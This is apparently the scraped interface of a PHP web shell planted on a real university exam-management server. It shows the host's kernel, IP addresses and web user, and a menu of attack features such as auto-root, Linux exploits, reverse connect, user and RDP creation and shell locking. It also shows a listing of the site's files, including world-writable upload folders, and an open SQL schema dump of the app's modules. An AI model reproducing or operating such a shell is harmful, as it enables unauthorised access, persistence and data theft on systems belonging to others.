Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.43.200
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kswu /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
maya-pdf22
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
new_app_form_auto_fee
[ DIR ]
drwxr-xr-x
orms
[ DIR ]
drwxr-xr-x
phpmailer
[ DIR ]
drwxr-xr-x
popup
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
teacher_photos
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
validation_files
[ DIR ]
drwxr-xr-x
MainPage.html
12.31
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.42
KB
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
collegeInfoPopup.html
3.79
KB
-rwxr-xr-x
db24032015.sql
103.62
KB
-rwxr-xr-x
db_s_ref_type24032015.sql
2.65
KB
-rwxr-xr-x
db_s_user_schema24032015.sql
21.18
KB
-rwxr-xr-x
getQPdet.php
5.48
KB
-rw-rw-r--
homepage.html
3.35
KB
-rwxr-xr-x
index.php
81
B
-rwxr-xr-x
index_wait.html
6.1
KB
-rwxr-xr-x
indexlogin.html
5.96
KB
-rwxr-xr-x
paytm_res.php
6.51
KB
-rwxr-xr-x
resetPasswordOTP.html
2.03
KB
-rwxr-xr-x
resetPasswordPopup.html
1.79
KB
-rwxr-xr-x
rzp_kswu.csv
67
B
-rwxr-xr-x
spinner_bar.gif
1.81
KB
-rwxr-xr-x
valdet.php
12.17
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db_s_user_schema24032015.sql
/* SQLyog Ultimate v11.33 (64 bit) MySQL - 5.6.12-log : Database - resultsg_kus ********************************************************************* */ /*!40101 SET NAMES utf8 */; /*!40101 SET SQL_MODE=''*/; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; CREATE DATABASE /*!32312 IF NOT EXISTS*/`resultsg_kus` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `resultsg_kus`; /*Table structure for table `s_user_schema` */ DROP TABLE IF EXISTS `s_user_schema`; CREATE TABLE `s_user_schema` ( `internal_code` bigint(11) unsigned NOT NULL AUTO_INCREMENT, `module_name` varchar(100) COLLATE latin1_general_ci DEFAULT NULL, `display_module_name` varchar(100) COLLATE latin1_general_ci DEFAULT NULL, `module_type` int(11) DEFAULT NULL, `display_type` varchar(19) COLLATE latin1_general_ci DEFAULT NULL, `is_menu_only` int(11) DEFAULT '0', `menu_function` varchar(100) COLLATE latin1_general_ci DEFAULT NULL, `active` int(1) DEFAULT '1', `main_menu` varchar(50) COLLATE latin1_general_ci DEFAULT NULL, `create_table` int(1) DEFAULT '0', `include_save` int(1) DEFAULT '1', `include_clear` int(1) DEFAULT '1', `include_download` int(1) DEFAULT '1', `include_view` int(1) DEFAULT '1', `include_generate` int(1) DEFAULT '1', `include_close` int(1) DEFAULT '0', `custom_links` text COLLATE latin1_general_ci, `sequence` decimal(5,2) DEFAULT NULL, `grid_type` varchar(15) COLLATE latin1_general_ci DEFAULT 'Normal', `grid_default_rows` decimal(15,2) DEFAULT NULL, `s_col_names` text COLLATE latin1_general_ci, `s_col_model` text COLLATE latin1_general_ci, `s_grid_query` text COLLATE latin1_general_ci, `s_grid_custom_links` text COLLATE latin1_general_ci, `include_help` int(1) DEFAULT '0', `js_path` varchar(200) COLLATE latin1_general_ci DEFAULT NULL, PRIMARY KEY (`internal_code`), KEY `module_type` (`module_type`), KEY `active` (`active`), KEY `display_type` (`display_type`), KEY `grid_type` (`grid_type`) ) ENGINE=MyISAM AUTO_INCREMENT=100 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci ROW_FORMAT=DYNAMIC; /*Data for the table `s_user_schema` */ insert into `s_user_schema`(`internal_code`,`module_name`,`display_module_name`,`module_type`,`display_type`,`is_menu_only`,`menu_function`,`active`,`main_menu`,`create_table`,`include_save`,`include_clear`,`include_download`,`include_view`,`include_generate`,`include_close`,`custom_links`,`sequence`,`grid_type`,`grid_default_rows`,`s_col_names`,`s_col_model`,`s_grid_query`,`s_grid_custom_links`,`include_help`,`js_path`) values (1,'User Setup','User Setup',9,NULL,1,'enableUserSetUp()',1,NULL,0,1,1,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(2,'User Rights','User Rights',9,NULL,1,'enableUserRightsSetUp()',1,NULL,0,1,1,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(3,'General Master Setup','General Master Setup',18,NULL,1,'enablegeneralmaster()',1,NULL,0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(4,'User Schema Group','User Schema Group',18,NULL,1,'enable_user_schema_group()',1,NULL,0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(5,'User Schema Elements','User Schema Elements',18,NULL,1,'enable_user_schema_elements()',1,NULL,0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(6,'Grid Display','Grid Display',18,NULL,1,'populateAllGridFiles()',1,'21',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(7,'Meta Columns','Meta Columns',18,NULL,1,'createModuleMetaColumns()',1,'21',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(9,'Update DbFields','Update DbFields',18,NULL,1,'updateUserSchemaElementDbField()',1,'21',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(10,'All Group Grid Files','All Group Grid Files',18,NULL,1,'populateAllGridGroupFiles()',1,'21',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(11,'Collge Degree Status','College Degree Status',20,'Left Right',1,'CollegeDegreeStatus()',1,'0',0,0,0,0,0,0,0,'Save~saveCollegeDegreeStatus()|Clear~CollegeDegreeStatus()','0.00','Normal','0.00','','','','',0,''),(12,'Admission Entry','Admission Entry',45,'Left Right',1,'studentEntry()',1,'56',0,0,0,0,0,0,0,'Save~SaveStudentEntry()|View~ViewStudentDetails()|Clear~studentEntry()','0.00','Normal','0.00','','','','',0,''),(13,'Mark Entry (Subjectwise)','Marks Entry',45,'Left Right',1,'$g_screen_type=\'me\';markentrysubjectwise();',1,'58',0,0,0,0,0,0,0,'Save~SaveMarkEntryStudetwise()|Clear~markentrysubjectwise()|Exit~home()','0.00','Normal','0.00','','','','',0,''),(14,'Mark Entry (Studentwise)','Marks Entry',45,'Left Right',1,'$g_screen_type=\'me\';markentrystudentwise()',0,'0',0,0,0,0,0,0,0,'Save~SaveMarkEntryStudentwise()|Clear~markentrystudentwise()|Exit~home()','0.00','Normal','0.00','','','','',0,''),(15,'Application Form','Application Entry',45,'Bottom',1,'candidateList()',1,'57',0,0,0,0,0,0,0,'Save~saveCandidateEntryDetails()|Clear~candidateList() ','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(17,'Block Users','Block Users',26,NULL,0,'',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(18,'User Setup','User Setup',20,NULL,1,'enableUserSetUp()',1,'0',0,1,1,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(19,'User Rights','User Rights',20,NULL,1,'enableUserRightsSetUp()',1,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(20,'Absent Entry','Absent Entry',54,'Left Right',1,'$g_screen_type=\'AB\';absententrysubjectwise();',0,'0',0,0,0,0,0,0,0,'Add~AddAbsentEntry()|Save~SaveAbsEntryStudetwise()|Clear~absententrysubjectwise()','0.00','Normal','0.00','','','','',0,''),(21,'MP / UFM Entry','MP / UFM Entry',54,NULL,1,'$g_screen_type=\'MP\';absententrysubjectwise();',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(23,'Student Check List','Student Check List',13,NULL,0,'',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(24,'Candidate List','Candidate List',13,NULL,0,'',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(26,'Mal Practice List','Mal Practice List',13,NULL,0,'',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(27,'IA Marks Check List','IA Marks Check List',13,NULL,0,'',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(28,'Degree Selection','Degree',5,NULL,1,'IdentifyTransactions()',1,'0',0,0,0,0,0,0,0,'Save~saveIdentifyTransactions()|Report~GenerateDegreeReport()|Exit~IdentifyTransactions();','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(29,'Module','Module',20,'Left Right',1,'enablemodulesetup()',1,'0',0,0,0,0,0,0,0,'Save~saveModuleSetup()|Clear~enablemodulesetup()','0.00','Normal','0.00','','','','',0,''),(30,'Freeze Module at Univ/Coll','Freeze Module at Univ/Coll',20,'Left Right',1,'freezeModuleAtUniversityOrCollege()',1,'0',0,0,0,0,0,0,0,'Save~savefreezeModuleAtUniversityOrCollege()|Clear~freezeModuleAtUniversityOrCollege()','0.00','Normal','0.00','','','','',0,''),(31,'Subjectwise Freezing','Subjectwise Freezing',45,'Left Right',1,'freezeModuleAtAdminCollegeSubject()',1,'58',0,0,0,0,0,0,0,'Save~savefreezeModuleAtAdminCollegeSubject()|Clear~freezeModuleAtAdminCollegeSubject()','0.00','Normal','0.00','','','','',0,''),(32,'Modulewise Freezing','Modulewise Freezing',20,'Left Right',1,'FreezeAdClMe()',1,'0',0,0,0,0,0,0,0,'Save~saveAdClMe()|Clear~FreezeAdClMe()','0.00','Normal','0.00','','','','',0,''),(33,'Change Password','Change Password',9,NULL,1,'enableUserSetUp()',1,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(34,'Admission Listing','Admission Listing',45,NULL,1,'AdmissionListing()',1,'56',0,0,0,0,0,0,0,'Generate~GenerateAdmissionReport()|Clear~AdmissionListing()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(35,'Marks List (Subjectwise)','Marks List',45,'Left Right',1,'enableMarksListSubjectWise()',0,'58',0,0,0,0,0,0,0,'Generate~GenerateMarksEntrySubjectWiseReport()|Clear~enableMarksListSubjectWise()','0.00','Normal','0.00','','','','',0,''),(36,'Marks List (Studentwise)','Marks List',45,'Left Right',1,'enableMarksListStudentWise()',1,'58',0,0,0,0,0,0,0,'Report~GenerateMarksStudentListReport()|Clear~enableMarksListStudentWise()|Exit~home()','0.00','Normal','0.00','','','','',0,''),(37,'Degree List','Degree List',5,NULL,1,'DegreeList()',0,'0',0,0,0,0,0,0,0,'Generate~GenerateDegreeReport()|Clear~DegreeList()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(38,'Subject List (Adm & CL)','Subject List (Adm & CL)',5,NULL,1,'SubjectListAdmCl()',0,'0',0,0,0,0,0,0,0,'Generate~GenerateSublistADCLReport()|Clear~SubjectListAdmCl()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(39,'Subject List (General)','Subject',5,NULL,1,'SubjectListGeneral()',1,'0',0,0,0,0,0,0,0,'Report~GenerateSublistGENReport()|Exit~SubjectListGeneral()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(40,'Dispatch Answers Script','Dispatch Answer Scripts',54,NULL,1,'enableDispatchanswerscript()',0,'0',0,0,0,0,0,0,0,'Add~showDispatchAnswerScript()|Save~saveDispatchAnswerScripts()|Clear~Dispatchanswerscript()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(41,'Daily Report','Daily Report',54,NULL,1,'DailyReport()',0,'0',0,0,0,0,0,0,0,'Generate~GenerateDailyReport()|Clear~DailyReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(42,'Candidate List Printing','Candidate List (Galley)',45,'Bottom',1,'CandidateListPrinting()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateCandidateListReport()|Clear~CandidateListPrinting()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(43,'Admission Ticket','Hall Ticket',45,'Bottom',1,'AdmissionTicket()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateAdmissionTicket()|Clear~AdmissionTicket()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(44,'Import Tables Setup','Import Tables Setup',29,NULL,1,'ImportTablesSetup()',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(45,'Export Tables Setup','Export Tables Setup',29,NULL,1,'ExportTablesSetup()',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(46,'Export Tables','Export Tables',9,NULL,1,'ExportTablesUtility()',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(47,'Import Tables','Import Tables',9,NULL,1,'ImportTablesUtility()',0,'0',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(48,'Admission Entry Status','Admission Entry Status',51,'Left Right',1,'EnableAdmissionEntryStatus()',1,'0',0,0,0,0,0,0,0,'','0.00','Normal','0.00','','','','',0,''),(49,'Message Board','Message Board',9,'Top Bottom',1,'EnableMessageBoard()',1,'0',0,0,0,0,0,0,0,'Save~SaveMessageBoard()|View~ViewMessageBoard()|Clear~EnableMessageBoard()','0.00','Normal','0.00','','','','',0,''),(50,'Message Board','Message Board',51,'Top Bottom',1,'EnableMessageBoard()',1,'0',0,0,0,0,0,0,0,'Save~SaveMessageBoard()|View~ViewMessageBoard()|Clear~EnableMessageBoard()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(51,'Subject Wise Student List','Appearing List (Subjectwise)',45,'Bottom',1,'SubjectWiseStudentList()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateSubjectWiseStudentList()|Clear~SubjectWiseStudentList()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(52,'Revaluation','Revaluation',54,'Top Bottom',1,'Revaluation()',1,'0',0,0,0,0,0,0,0,'Save~SaveRevaluation()|Clear~Revaluation()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(53,'Revaluation Report','Revaluation Report',54,'Top Bottom',1,'RevaluationReport()',1,'0',0,0,0,0,0,0,0,'Generate~GenerateRevalutionReport()|Clear~RevalutionReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(55,'Excute UserDefined Qry ','Excute UserDefined Qry ',20,'Top Bottom',1,'ExcuteUserDefinedQry()',1,'0',0,0,0,0,0,0,0,'Execute~ExecuteQryFromPhp()|Select~GetQueryResultSet()|Download~GetQueryResultSetForDownload()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(56,'Batch Setup','Batch Preparation',46,'Top Bottom',1,'EnableBatchSetup()',1,'0',0,0,0,0,0,0,0,'Work Sheet~GenerateWorkSheetPopup()|Batch Report~GenerateBatchSetupPopup()|Clear~EnableBatchSetup()|Save~SaveBatchWiseDetails()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(57,'Marks Entry/Printing','Marks Entry/Printing',46,'Top Bottom',1,'EnablePracticalMarksSetup()',1,'0',0,0,0,0,0,0,0,'Save~SavePracticalEntryMarks()|Clear~EnablePracticalMarksSetup()|Mark Entry Report~GeneratePracticalMarksReports()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(58,'Practical Entry Freezing','Practical Entry Freezing',46,'Top Bottom',1,'EnablePracticalEntryFreezing(\'FREEZE\')',1,'0',0,0,0,0,0,0,0,'Clear~EnablePracticalEntryFreezing(\'FREEZE\')|Save~FreezePracticalMaks()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(59,'Batch Wise Time Table','Batch Wise Time Table',46,'Top Bottom',1,'EnablePracticalEntryFreezing(\'TIMETABLE\')',1,'0',0,0,0,0,0,0,0,'Batch Report~GenerateBatchSetupPopup()|WorkSheet~GenerateWorkSheetPopup()|Clear~EnablePracticalEntryFreezing(\'TIMETABLE\')|Save~FreezePracticalMaks()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(60,NULL,NULL,NULL,NULL,0,NULL,1,NULL,0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(61,'Evaluation','Evaluation',13,'Top Bottom',1,'EnableEvaluation()',1,NULL,0,0,0,0,0,0,0,'MarksList~GenerateEvaluationmarksListReport()|Save~SaveEvaluation()|Clear~EnableEvaluation()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(62,'Evaluation Report','Evaluation Report',13,'Top Bottom',1,'EnableEvaluationReport()',0,NULL,0,0,0,0,0,0,0,'Generate~GenerateEvaluationReport()|Clear~EnableEvaluationReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(63,'Freeze Marks','Freeze Marks',13,'Top Bottom',1,'EnableFreezeMarks()',1,NULL,0,0,0,0,0,0,0,'Save~SaveFreezeMarks()|Clear~EnableFreezeMarks()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(64,'Deviation report','Deviation report',13,'Top Bottom',1,'EnableDeviationReport()',1,NULL,0,0,0,0,0,0,0,'Generate~GenerateDeviationReport()|Clear~EnableDeviationReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(65,'Marks Deviation Report','Marks Deviation Report',13,'Top Bottom',1,'EnableMarksDeviationReport()',0,NULL,0,0,0,0,0,0,0,'Generate~GenerateMarkDeviationReport()|Clear~EnableMarkDeviationReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(66,'TEACHERS','Teachers',5,'Left Right',1,'EnableTeacherEntry()',1,NULL,0,0,0,0,0,0,0,'Add~EnableAddTeacherEntry()|Save~SaveTeachersEntry()|View~ViewTeacherDetails()|Report~GenerateTeacherReport()|Delete~deleteTeacherRecord()|Exit~EnableTeacherEntry()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(67,'Teachers Report','Teachers Report',5,NULL,1,'EnableTeacherReport()',0,NULL,0,0,0,0,0,0,0,'Report~GenerateTeacherReport()|Exit~EnableTeacherReport()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(68,'Download Files','Download Files',5,NULL,1,'DownloadMiscFiles()',0,NULL,0,0,0,0,0,0,0,'clear~DownloadMiscFiles()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(69,'Import Marks','Import Marks',5,NULL,1,'ImportMarks()',0,NULL,0,0,0,0,0,0,0,'clear~ImportMarks()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(87,'Appearing List (QP Wise)','Collegewise Appearing List (QP Wise)',45,'Bottom',1,'EnableAppearingListQPWise()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateAppearingListQPWise()|Clear~LoadEnableAppearingListQPWise()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(71,'Absent Entry QP Code','Absent Entry (QP Code)',54,'Top Bottom',1,'$g_screen_type=\'ab\';absententrysubjectwiseQP();',1,NULL,0,0,0,0,0,0,0,'Add~AddAbsentEntryQp()|Save~SaveAbsEntryQpStudetwise()|Clear~absententrysubjectwiseQP()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(72,'Mp/UFM QP Code','MP / UFM (QP Code)',54,'Top Bottom',1,'$g_screen_type=\'mp\';absententrysubjectwiseQP();',1,NULL,0,0,0,0,0,0,0,'Add~AddAbsentEntryQp()|Save~SaveAbsEntryQpStudetwise()|Clear~absententrysubjectwiseQP()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(73,'Dispatch Answers Script QP Code','Dispatch Answers Script (QP Code)',54,'Top Bottom',1,'enableDispatchanswerscriptQp()',1,NULL,0,0,0,0,0,0,0,'Add~showDispatchAnswerScriptQP()|Save~saveDispatchAnswerScriptsQp()|Clear~LoadEnableDispatchanswerscriptQp()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(74,'Daily Report QP Code','Daily Report (QP Code)',54,'Top Bottom',1,'DailyReportQp()',1,NULL,0,0,0,0,0,0,0,'Generate~GenerateDailyReportQp()|Clear~DailyReportQp()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(75,'Acknowledge RV/RT Applications','Acknowledge RV / RT / PC Applications',6,NULL,1,'EnableAckRvRtApplication()',1,NULL,0,0,0,0,0,0,0,'Clear~EnableAckRvRtApplication()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(76,'Challan Preparation','RV / RT / PC Challan Preparation',6,NULL,1,'EnableChallanPreparation()',1,NULL,0,0,0,0,0,0,0,'Clear~ChallanPreparation()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(77,'Challan Entries','RV / RT / PC Challan Entries',6,NULL,1,'EnableChallanEntries()',1,NULL,0,0,0,0,0,0,0,'Clear~EnableChallanEntries()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(78,'Receivce RV/RT Applications','Recieve RV/RT Applications',20,'Top Bottom',1,'EnableReceiveRvRtApplication()',1,NULL,0,0,0,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(79,'GuideLines','RV / RT / PC GuideLines',6,NULL,1,'EnableRvRtGuideLines()',1,NULL,0,0,0,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(80,'Acknowledge Exam App Form','Acknowledge Exam Application Form',45,'Bottom',1,'EnableAckExamAppForm()',1,'57',0,0,0,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(81,'Exam Application Form GuideLines','Application GuideLines',45,'Bottom',1,'EnableExamAppGuideLines()',1,'57',0,1,1,1,1,1,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(82,'Room Allotment','Room Allotment',45,'Top Bottom',1,'EnableRoomAllotment()',1,'55',0,0,0,0,0,0,0,'Save~SaveRoomAllotment()|Clear~CallEnableRoomAllotment()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(83,'QPwise Students Count','QPwise Students Count',45,NULL,1,'EnableQPwiseStudentsCount()',1,'55',0,0,0,0,0,0,0,'Generate~GenerateRAQPwiseStudentsCount()|Clear~CallEnableQPwiseStudentsCount()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(84,'Roomwise Register Nos List','Roomwise Register Nos List',45,NULL,1,'EnableRoomwiseRegisterNosList()',1,'55',0,0,0,0,0,0,0,'Generate~GenerateRoomwiseRegisterNosList()|Clear~EnableRoomwiseRegisterNosList()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(85,'Invigilators Dairy','Invigilators Dairy',45,NULL,1,'EnableInvigilatorsDairy()',1,'55',0,0,0,0,0,0,0,'Generate~GenerateInvigilatorsDairy()|Clear~EnableInvigilatorsDairy()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(86,'Acknowledged Exam App Form','Acknowledged Exam Application Form',45,'Bottom',1,'EnableAcknowledgedExamAppForm()',1,'57',0,0,0,0,0,0,0,NULL,'0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(88,'Center Wise Appearing List (QP Wise)','Centerwise appearing List (QP Wise)',45,'Bottom',1,'EnableCenterAppearingListQPWise()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateCenterAppearingListQPWise()|Clear~EnableCenterAppearingListQPWise()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(89,'Collegewise Student List','Collegewise Student List',45,'Bottom',1,'CollegeWiseStudentListPrinting()',1,'57',0,0,0,0,0,0,0,'Generate~GenerateCollegeWiseStudListReport()|Clear~CollegeWiseStudentListPrinting()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(90,'Upload Photo','Upload Photo',5,NULL,1,'uploadStudentPhotos()',1,NULL,0,0,0,0,0,0,0,'View~viewUploadStudentPhoto()|Clear~uploadStudentPhotos()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(92,'Attendance Entry','Attendance Entry',45,'Left Right',1,'EnableAttendanceScreen()',1,'59',0,0,0,0,0,0,0,'Save~SaveAttendanceDetails()|Clear~clearAttendanceEntrytextbox()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(93,'Mark Entry2 (Subjectwise)','I.A. Mark Entry - 2',45,'',1,'$g_screen_type=\'me\';markentrysubjectwise(2);',0,'58',0,0,0,0,0,0,0,'Save~SaveMarkEntryStudetwise()|Clear~markentrysubjectwise()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(94,'Attendance Summary Report','Attendance Summary Report',45,'Top Bottom',1,'EnableAttendanceReportScreen()',1,'59',0,0,0,0,0,0,0,'Generate~GenerateAttendanceSummaryReport()|Clear~EnableAttendanceReportScreen()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(95,'Update Section','Update Section',45,NULL,1,'EnableUpdateSection()',1,NULL,0,0,0,0,0,0,0,'Save~SaveStudentSection()|Clear~ClearStudentSection()','0.00','Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(96,'Identify Subject For Fresh Exam','Identify Subject For Fresh Exam',45,NULL,1,'FreshExamSubject()',1,NULL,0,0,0,0,0,0,0,'Save~saveFreshExamEntryDetails()|Clear~ClearIdentifySubjFreshExam()',NULL,'Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(98,'User Wise Subject Identification','User Wise Subject Identification',9,NULL,1,'enableUserSubjIdentfy()',1,NULL,0,0,0,0,0,0,0,'Save~SaveUserSubjIdentify()|Clear~ClearUserSubjIdentify()',NULL,'Normal',NULL,NULL,NULL,NULL,NULL,0,NULL),(99,'Uplaod Photo','Upload Photo',20,NULL,1,'uploadStudentPhotos()',1,'0',0,0,0,0,0,0,0,'View~viewUploadStudentPhoto()|Clear~uploadStudentPhotos()',NULL,'Normal',NULL,NULL,NULL,NULL,NULL,0,NULL); /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
Close